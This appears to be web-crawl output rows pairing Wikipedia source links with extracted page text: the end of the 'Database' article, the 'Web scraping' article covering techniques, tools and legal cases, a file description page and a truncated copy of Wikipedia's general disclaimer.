concepts as System R in the early 1970s. The first version was ready in 1974 5, and work then started on multi-table systems in which the data could be split so that all of the data for a record (some of which is optional) did not have to be stored in a single large "chunk". Subsequent multi-user versions were tested by customers in 1978 and 1979, by which time a standardized query language SQL citation needed had been added. Codd's ideas were establishing themselves as both workable and superior to CODASYL, pushing IBM to develop a true production version of System R, known as SQL DS, and, later, Database 2 (IBM Db2). Larry Ellison's Oracle Database (or more simply, Oracle) started from a different chain, based on IBM's papers on System R. Though Oracle V1 implementations were completed in 1978, it was not until Oracle Version 2 when Ellison beat IBM to market in 1979. 18 Stonebraker went on to apply the lessons from INGRES to develop a new database, Postgres, which is now known as PostgreSQL. PostgreSQL is often used for global mission-critical applications (the .org and .info domain name registries use it as their primary data store, as do many large companies and financial institutions). In Sweden, Codd's paper was also read and Mimer SQL was developed in the mid 1970s at Uppsala University. In 1984, this project was consolidated into an independent enterprise. Another data model, the entity relationship model, emerged in 1976 and gained popularity for database design as it emphasized a more familiar description than the earlier relational model. Later on, entity relationship constructs were retrofitted as a data modeling construct for the relational model, and the difference between the two has become irrelevant. citation needed The 1980s ushered in the age of desktop computing. The new computers empowered their users with spreadsheets like Lotus 1 2 3 and database software like dBASE. The dBASE product was lightweight and easy for any computer user to understand out of the box. C. Wayne Ratliff, the creator of dBASE, stated: "dBASE was different from programs like BASIC, C, FORTRAN, and COBOL in that a lot of the dirty work had already been done. The data manipulation is done by dBASE instead of by the user, so the user can concentrate on what he is doing, rather than having to mess with the dirty details of opening, reading, and closing files, and managing space allocation. 19 dBASE was one of the top selling software titles in the 1980s and early 1990s. The 1990s, along with a rise in object-oriented programming, saw a growth in how data in various databases were handled. Programmers and designers began to treat the data in their databases as objects. That is to say that if a person's data were in a database, that person's attributes, such as their address, phone number, and age, were now considered to belong to that person instead of being extraneous data. This allows for relations between data to be related to objects and their attributes and not to individual fields. 20 The term "object relational impedance mismatch" described the inconvenience of translating between programmed objects and database tables. Object databases and object relational databases attempt to solve this problem by providing an object-oriented language (sometimes as extensions to SQL) that programmers can use as alternative to purely relational SQL. On the programming side, libraries known as object relational mappings (ORMs) attempt to solve the same problem. XML databases are a type of structured document-oriented database that allows querying based on XML document attributes. XML databases are mostly used in applications where the data is conveniently viewed as a collection of documents, with a structure that can vary from the very flexible to the highly rigid: examples include scientific articles, patents, tax filings, and personnel records. NoSQL databases are often very fast, do not require fixed table schemas, avoid join operations by storing denormalized data, and are designed to scale horizontally. In recent years, there has been a strong demand for massively distributed databases with high partition tolerance, but according to the CAP theorem, it is impossible for a distributed system to simultaneously provide consistency, availability, and partition tolerance guarantees. A distributed system can satisfy any two of these guarantees at the same time, but not all three. For that reason, many NoSQL databases are using what is called eventual consistency to provide both availability and partition tolerance guarantees with a reduced level of data consistency. NewSQL is a class of modern relational databases that aims to provide the same scalable performance of NoSQL systems for online transaction processing (read-write) workloads while still using SQL and maintaining the ACID guarantees of a traditional database system. Databases are used to support internal operations of organizations and to underpin online interactions with customers and suppliers (see Enterprise software). Databases are used to hold administrative information and more specialized data, such as engineering data or economic models. Examples include computerized library systems, flight reservation systems, computerized parts inventory systems, and many content management systems that store websites as collections of webpages in a database. One way to classify databases involves the type of their contents, for example: bibliographic, document-text, statistical, or multimedia objects. Another way is by their application area, for example: accounting, music compositions, movies, banking, manufacturing, or insurance. A third way is by some technical aspect, such as the database structure or interface type. This section lists a few of the adjectives used to characterize different kinds of databases. Connolly and Begg define database management system (DBMS) as a "software system that enables users to define, create, maintain and control access to the database. 24 Examples of DBMS's include MySQL, MariaDB, PostgreSQL, Microsoft SQL Server, Oracle Database, and Microsoft Access. The DBMS acronym is sometimes extended to indicate the underlying database model, with RDBMS for the relational, OODBMS for the object (oriented) and ORDBMS for the object relational model. Other extensions can indicate some other characteristics, such as DDBMS for a distributed database management systems. The functionality provided by a DBMS can vary enormously. The core functionality is the storage, retrieval and update of data. Codd proposed the following functions and services a fully-fledged general purpose DBMS should provide: 25 It is also generally to be expected the DBMS will provide a set of utilities for such purposes as may be necessary to administer the database effectively, including import, export, monitoring, defragmentation and analysis utilities. 26 The core part of the DBMS interacting between the database and the application interface sometimes referred to as the database engine. Often DBMSs will have configuration parameters that can be statically and dynamically tuned, for example the maximum amount of main memory on a server the database can use. The trend is to minimize the amount of manual configuration, and for cases such as embedded databases the need to target zero-administration is paramount. The large major enterprise DBMSs have tended to increase in size and functionality and have involved up to thousands of human years of development effort throughout their lifetime. a Early multi-user DBMS typically only allowed for the application to reside on the same computer with access via terminals or terminal emulation software. The client server architecture was a development where the application resided on a client desktop and the database on a server allowing the processing to be distributed. This evolved into a multitier architecture incorporating application servers and web servers with the end user interface via a web browser with the database only directly connected to the adjacent tier. 28 A general-purpose DBMS will provide public application programming interfaces (API) and optionally a processor for database languages such as SQL to allow applications to be written to interact with and manipulate the database. A special purpose DBMS may use a private API and be specifically customized and linked to a single application. For example, an email system performs many of the functions of a general-purpose DBMS such as message insertion, message deletion, attachment handling, blocklist lookup, associating messages an email address and so forth however these functions are limited to what is required to handle email. External interaction with the database will be via an application program that interfaces with the DBMS. 29 This can range from a database tool that allows users to execute SQL queries textually or graphically, to a website that happens to use a database to store and search information. A programmer will code interactions to the database (sometimes referred to as a datasource) via an application program interface (API) or via a database language. The particular API or language chosen will need to be supported by DBMS, possibly indirectly via a preprocessor or a bridging API. Some API's aim to be database independent, ODBC being a commonly known example. Other common API's include JDBC and ADO.NET. Database languages are special-purpose languages, which allow one or more of the following tasks, sometimes distinguished as sublanguages: Database languages are specific to a particular data model. Notable examples include: A database language may also incorporate features like: Database storage is the container of the physical materialization of a database. It comprises the internal (physical) level in the database architecture. It also contains all the information needed (e.g., metadata, "data about the data", and internal data structures) to reconstruct the conceptual level and external level from the internal level when needed. Databases as digital objects contain three layers of information which must be stored: the data, the structure, and the semantics. Proper storage of all three layers is needed for future preservation and longevity of the database. 33 Putting data into permanent storage is generally the responsibility of the database engine a.k.a. "storage engine". Though typically accessed by a DBMS through the underlying operating system (and often using the operating systems' file systems as intermediates for storage layout), storage properties and configuration settings are extremely important for the efficient operation of the DBMS, and thus are closely maintained by database administrators. A DBMS, while in operation, always has its database residing in several types of storage (e.g., memory and external storage). The database data and the additional needed information, possibly in very large amounts, are coded into bits. Data typically reside in the storage in structures that look completely different from the way the data look at the conceptual and external levels, but in ways that attempt to optimize (the best possible) these levels' reconstruction when needed by users and programs, as well as for computing additional types of needed information from the data (e.g., when querying the database). Some DBMSs support specifying which character encoding was used to store data, so multiple encodings can be used in the same database. Various low-level database storage structures are used by the storage engine to serialize the data model so it can be written to the medium of choice. Techniques such as indexing may be used to improve performance. Conventional storage is row-oriented, but there are also column-oriented and correlation databases. Often storage redundancy is employed to increase performance. A common example is storing materialized views, which consist of frequently needed external views or query results. Storing such views saves the expensive computing them each time they are needed. The downsides of materialized views are the overhead incurred when updating them to keep them synchronized with their original updated database data, and the cost of storage redundancy. Occasionally a database employs storage redundancy by database objects replication (with one or more copies) to increase data availability (both to improve performance of simultaneous multiple end-user accesses to the same database object, and to provide resiliency in a case of partial failure of a distributed database). Updates of a replicated object need to be synchronized across the object copies. In many cases, the entire database is replicated. With data virtualization, the data used remains in its original locations and real-time access is established to allow analytics across multiple sources. This can aid in resolving some technical difficulties such as compatibility problems when combining data from various platforms, lowering the risk of error caused by faulty data, and guaranteeing that the newest data is used. Furthermore, avoiding the creation of a new database containing personal information can make it easier to comply with privacy regulations. However, with data virtualization, the connection to all necessary data sources must be operational as there is no local copy of the data, which is one of the main drawbacks of the approach. 34 Database security deals with all various aspects of protecting the database content, its owners, and its users. It ranges from protection from intentional unauthorized database uses to unintentional database accesses by unauthorized entities (e.g., a person or a computer program). Database access control deals with controlling who (a person or a certain computer program) are allowed to access what information in the database. The information may comprise specific database objects (e.g., record types, specific records, data structures), certain computations over certain objects (e.g., query types, or specific queries), or using specific access paths to the former (e.g., using specific indexes or other data structures to access information). Database access controls are set by special authorized (by the database owner) personnel that uses dedicated protected security DBMS interfaces. This may be managed directly on an individual basis, or by the assignment of individuals and privileges to groups, or (in the most elaborate models) through the assignment of individuals and groups to roles which are then granted entitlements. Data security prevents unauthorized users from viewing or updating the database. Using passwords, users are allowed access to the entire database or subsets of it called "subschemas". For example, an employee database can contain all the data about an individual employee, but one group of users may be authorized to view only payroll data, while others are allowed access to only work history and medical data. If the DBMS provides a way to interactively enter and update the database, as well as interrogate it, this capability allows for managing personal databases. Data security in general deals with protecting specific chunks of data, both physically (i.e., from corruption, or destruction, or removal; e.g., see physical security), or the interpretation of them, or parts of them to meaningful information (e.g., by looking at the strings of bits that they comprise, concluding specific valid credit-card numbers; e.g., see data encryption). Change and access logging records who accessed which attributes, what was changed, and when it was changed. Logging services allow for a forensic database audit later by keeping a record of access occurrences and changes. Sometimes application-level code is used to record changes rather than leaving this in the database. Monitoring can be set up to attempt to detect security breaches. Therefore, organizations must take database security seriously because of the many benefits it provides. Organizations will be safeguarded from security breaches and hacking activities like firewall intrusion, virus spread, and ransom ware. This helps in protecting the company's essential information, which cannot be shared with outsiders at any cause. 35 Database transactions can be used to introduce some level of fault tolerance and data integrity after recovery from a crash. A database transaction is a unit of work, typically encapsulating a number of operations over a database (e.g., reading a database object, writing, acquiring or releasing a lock, etc.), an abstraction supported in database and also other systems. Each transaction has well defined boundaries in terms of which program code executions are included in that transaction (determined by the transaction's programmer via special transaction commands). The acronym ACID describes some ideal properties of a database transaction: atomicity, consistency, isolation, and durability. A database built with one DBMS is not portable to another DBMS (i.e., the other DBMS cannot run it). However, in some situations, it is desirable to migrate a database from one DBMS to another. The reasons are primarily economical (different DBMSs may have different total costs of ownership or TCOs), functional, and operational (different DBMSs may have different capabilities). The migration involves the database's transformation from one DBMS type to another. The transformation should maintain (if possible) the database related application (i.e., all related application programs) intact. Thus, the database's conceptual and external architectural levels should be maintained in the transformation. It may be desired that also some aspects of the architecture internal level are maintained. A complex or large database migration may be a complicated and costly (one-time) project by itself, which should be factored into the decision to migrate. This is in spite of the fact that tools may exist to help migration between specific DBMSs. Typically, a DBMS vendor provides tools to help import databases from other popular DBMSs. After designing a database for an application, the next stage is building the database. Typically, an appropriate general-purpose DBMS can be selected to be used for this purpose. A DBMS provides the needed user interfaces to be used by database administrators to define the needed application's data structures within the DBMS's respective data model. Other user interfaces are used to select needed DBMS parameters (like security related, storage allocation parameters, etc.). When the database is ready (all its data structures and other needed components are defined), it is typically populated with initial application's data (database initialization, which is typically a distinct project; in many cases using specialized DBMS interfaces that support bulk insertion) before making it operational. In some cases, the database becomes operational while empty of application data, and data are accumulated during its operation. After the database is created, initialized and populated it needs to be maintained. Various database parameters may need changing and the database may need to be tuned (tuning) for better performance; application's data structures may be changed or added, new related application programs may be written to add to the application's functionality, etc. Sometimes it is desired to bring a database back to a previous state (for many reasons, e.g., cases when the database is found corrupted due to a software error, or if it has been updated with erroneous data). To achieve this, a backup operation is done occasionally or continuously, where each desired database state (i.e., the values of its data and their embedding in database's data structures) is kept within dedicated backup files (many techniques exist to do this effectively). When it is decided by a database administrator to bring the database back to this state (e.g., by specifying this state by a desired point in time when the database was in this state), these files are used to restore that state. Static analysis techniques for software verification can be applied also in the scenario of query languages. In particular, the Abstract interpretation framework has been extended to the field of query languages for relational databases as a way to support sound approximation techniques. 36 The semantics of query languages can be tuned according to suitable abstractions of the concrete domain of data. The abstraction of relational database systems has many interesting applications, in particular, for security purposes, such as fine-grained access control, watermarking, etc. Other DBMS features might include: Increasingly, there are calls for a single system that incorporates all of these core functionalities into the same build, test, and deployment framework for database management and source control. Borrowing from other developments in the software industry, some market such offerings as "DevOps for database". 37 The first task of a database designer is to produce a conceptual data model that reflects the structure of the information to be held in the database. A common approach to this is to develop an entity relationship model, often with the aid of drawing tools. Another popular approach is the Unified Modeling Language. A successful data model will accurately reflect the possible state of the external world being modeled: for example, if people can have more than one phone number, it will allow this information to be captured. Designing a good conceptual data model requires a good understanding of the application domain; it typically involves asking deep questions about the things of interest to an organization, like "can a customer also be a supplier? , or "if a product is sold with two different forms of packaging, are those the same product or different products? , or "if a plane flies from New York to Dubai via Frankfurt, is that one flight or two (or maybe even three)? . The answers to these questions establish definitions of the terminology used for entities (customers, products, flights, flight segments) and their relationships and attributes. Producing the conceptual data model sometimes involves input from business processes, or the analysis of workflow in the organization. This can help to establish what information is needed in the database, and what can be left out. For example, it can help when deciding whether the database needs to hold historic data as well as current data. Having produced a conceptual data model that users are happy with, the next stage is to translate this into a schema that implements the relevant data structures within the database. This process is often called logical database design, and the output is a logical data model expressed in the form of a schema. Whereas the conceptual data model is (in theory at least) independent of the choice of database technology, the logical data model will be expressed in terms of a particular database model supported by the chosen DBMS. (The terms data model and database model are often used interchangeably, but in this article we use data model for the design of a specific database, and database model for the modeling notation used to express that design). The most popular database model for general-purpose databases is the relational model, or more precisely, the relational model as represented by the SQL language. The process of creating a logical database design using this model uses a methodical approach known as normalization. The goal of normalization is to ensure that each elementary "fact" is only recorded in one place, so that insertions, updates, and deletions automatically maintain consistency. The final stage of database design is to make the decisions that affect performance, scalability, recovery, security, and the like, which depend on the particular DBMS. This is often called physical database design, and the output is the physical data model. A key goal during this stage is data independence, meaning that the decisions made for performance optimization purposes should be invisible to end-users and applications. There are two types of data independence: Physical data independence and logical data independence. Physical design is driven mainly by performance requirements, and requires a good knowledge of the expected workload and access patterns, and a deep understanding of the features offered by the chosen DBMS. Another aspect of physical database design is security. It involves both defining access control to database objects as well as defining security levels and methods for the data itself. A database model is a type of data model that determines the logical structure of a database and fundamentally determines in which manner data can be stored, organized, and manipulated. The most popular example of a database model is the relational model (or the SQL approximation of relational), which uses a table-based format. Common logical data models for databases include: An object relational database combines the two related structures. Physical data models include: Other models include: Specialized models are optimized for particular types of data: A database management system provides three views of the database data: While there is typically only one conceptual and internal view of the data, there can be any number of different external views. This allows users to see database information in a more business-related way rather than from a technical, processing viewpoint. For example, a financial department of a company needs the payment details of all employees as part of the company's expenses, but does not need details about employees that are in the interest of the human resources department. Thus different departments need different views of the company's database. The three-level database architecture relates to the concept of data independence which was one of the major initial driving forces of the relational model. 39 The idea is that changes made at a certain level do not affect the view at a higher level. For example, changes in the internal level do not affect application programs written using conceptual level interfaces, which reduces the impact of making physical changes to improve performance. The conceptual view provides a level of indirection between internal and external. On the one hand it provides a common view of the database, independent of different external view structures, and on the other hand it abstracts away details of how the data are stored or managed (internal level). In principle every level, and even every external view, can be presented by a different data model. In practice usually a given DBMS uses the same data model for both the external and the conceptual levels (e.g., relational model). The internal level, which is hidden inside the DBMS and depends on its implementation, requires a different level of detail and uses its own types of data structure types. Database technology has been an active research topic since the 1960s, both in academia and in the research and development groups of companies (for example IBM Research). Research activity includes theory and development of prototypes. Notable research topics have included models, the atomic transaction concept, related concurrency control techniques, query languages and query optimization methods, RAID, and more. The database research area has several dedicated academic journals (for example, ACM Transactions on Database Systems-TODS, Data and Knowledge Engineering-DKE) and annual conferences (e.g., ACM SIGMOD, ACM PODS, VLDB, IEEE ICDE). |
248 | https://en.wikipedia.org/wiki/Web_scraping | https://www.worldcat.org/issn/1683-1470 | We’re sorry, but WorldCat does not work without JavaScript enabled. Please enable JavaScript on your browser. WorldCat is the world’s largest library catalog, helping you find library materials online. |
249 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/File:Question_book-new.svg | Original file (SVG file, nominally 512 399 pixels, file size: 13 KB) The source code of this SVG is valid. English: A new incarnation of Image:Question book 3.svg, which was uploaded by user AzaToth Created from scratch in Adobe Illustrator. Based on Image:Question book.png created by User:Equazcion May 29, 2008 Tkgd2007 See licensing. GFDL GNU Free Documentation License en.wikipedia.org wiki Wikipedia:Text of the GNU Free Documentation License This licensing tag was added to this file as part of the GFDL licensing update. Click on a date time to view the file as it appeared at that time. You cannot overwrite this file. The following file is a duplicate of this file (more details): More than 100 pages use this file. The following list shows the first 100 pages that use this file only. A full list is available. View more links to this file. This file contains additional information, probably added from the digital camera or scanner used to create or digitize it. If the file has been modified from its original state, some details may not fully reflect the modified file. |
250 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-12 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
251 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:General_disclaimer | Wikipedia makes no guarantee of validity Wikipedia is an online open-content collaborative encyclopedia; that is, a voluntary association of individuals and groups working to develop a common resource of human knowledge. The structure of the project allows anyone with an Internet connection to alter its content. Please be advised that nothing found here has necessarily been reviewed by people with the expertise required to provide you with complete, accurate, or reliable information. That is not to say that you will not find valuable and accurate information in Wikipedia; much of the time you will. However, Wikipedia cannot guarantee the validity of the information found here. The content of any given article may recently have been changed, vandalized, or altered by someone whose opinion does not correspond with the state of knowledge in the relevant fields. Note that most other encyclopedias and reference works also have disclaimers. Our active community of editors uses tools such as the Special:RecentChanges and Special:NewPages feeds to monitor new and changing content. However, Wikipedia is not uniformly peer reviewed; while readers may correct errors or engage in casual peer review, they have no legal duty to do so and thus all information read here is without any implied warranty of fitness for any purpose or use whatsoever. Even articles that have been vetted by informal peer review or featured article processes may later have been edited inappropriately, just before you view them. None of the contributors, sponsors, administrators, or anyone else connected with Wikipedia in any way whatsoever can be responsible for the appearance of any inaccurate or libelous information or for your use of the information contained in or linked from these web pages. Please make sure that you understand that the information provided here is being provided freely, and that no kind of agreement or contract is created between you and the owners or users of this site, the owners of the servers upon which it is housed, the individual Wikipedia contributors, any project administrators, sysops, or anyone else who is in any way connected with this project or sister projects subject to your claims against them directly. You are being granted a limited license to copy anything from this site; it does not create or imply any contractual or extracontractual liability on the part of Wikipedia or any of its agents, members, organizers, or other users. There is no agreement or understanding between you and Wikipedia regarding your use or modification of this information beyond the Creative Commons Attribution-Sharealike 4.0 Unported License (CC BY-SA) and the GNU Free Documentation License (GFDL); neither is anyone at Wikipedia responsible should someone change, edit, modify, or remove any information that you may post on Wikipedia or any of its associated projects. Any of the trademarks, service marks, collective marks, design rights, or similar rights that are mentioned, used, or cited in the articles of the Wikipedia encyclopedia are the property of their respective owners. Their use here does not imply that you may use them for any purpose other than for the same or a similar informational use as contemplated by the original authors of these Wikipedia articles under the CC BY-SA and GFDL licensing schemes. Unless otherwise stated, Wikipedia and Wikimedia sites are neither endorsed by, nor affiliated with, any of the holders of any such rights, and as such, Wikipedia cannot grant any rights to use any otherwise protected materials. Your use of any such or similar incorporeal property is at your own risk. Wikipedia contains material which may portray an identifiable person who is alive or recently-deceased. The use of images of living or recently-deceased individuals is, in some jurisdictions, restricted by laws pertaining to personality rights, independent from their copyright status. Before using these types of content, please ensure that you have the right to use it under the laws which apply in the circumstances of your intended use. You are solely responsible for ensuring that you do not 